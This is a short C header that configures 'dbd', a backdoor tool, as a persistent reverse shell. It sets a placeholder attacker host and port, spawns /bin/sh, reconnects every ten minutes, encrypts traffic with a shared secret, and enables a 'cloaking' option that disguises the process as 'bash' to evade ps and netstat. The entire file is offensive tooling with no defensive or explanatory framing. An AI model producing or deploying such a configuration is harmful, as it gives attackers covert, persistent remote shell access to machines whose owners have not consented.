/* this file is used to hardcode a behaviour into dbd.
 * to use this feature, uncomment one of the examples below,
 * or type in your own. when finished, recompile dbd.
 */

/* ATAT Unix Reverse Shell Settings*/

#define DOLISTEN 0
#define HOST "attackerip"
#define PORT "attackerport"
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 600
#define EXECPROG "/bin/sh"
#define ENCRYPTION 1
#define SHARED_SECRET "attackersecret"


/* Romulan Cloaking Technology - MUST DEFINE ALL OPTIONS IN THIS HEADER
 * When set to 1, this option will change argv[0] (and therefore the process's
 * entry in ps, netstat, etc) to "bash"
 * WARNING: Will remove other command-line variables, so only use it when hard
 * coding all variables into this header.
 */
#define CLOAK 1

/* "chat" options */

#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "

/* win32 specific options: */

#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "durandal_bd_semaphore"
